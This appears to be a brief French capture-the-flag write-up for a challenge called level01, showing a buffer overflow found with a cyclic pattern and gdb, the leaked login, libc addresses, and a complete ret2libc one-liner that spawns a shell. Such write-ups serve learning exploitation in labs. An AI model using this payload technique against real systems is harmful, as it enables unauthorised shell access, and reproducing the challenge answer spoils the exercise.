Pour level01, le `fgets` du mdp lit dans un buffer trop petit. On peut donc overflow le buffer et faire un ret2libc.

Le login, trouvé dans le code est `dat_wil`.

overflowing:
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT[UUUU]VVVVWWWWXXXXYYYYZZZZ111122223333444455556666777788889999

gdb nous donne:
Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()

Qui correspond à UUUU

adresse de system: `0xf7e6aed0` -> `\xd0\xae\xe6\xf7`
adresse de "\bin\sh": `0xf7f897ec` -> `\xec\x97\xf8\xf7`

(echo "dat_wil"; python -c "print('A' * 80 + '\xd0\xae\xe6\xf7' + 'AAAA' + '\xec\x97\xf8\xf7')"; cat) | ./level01
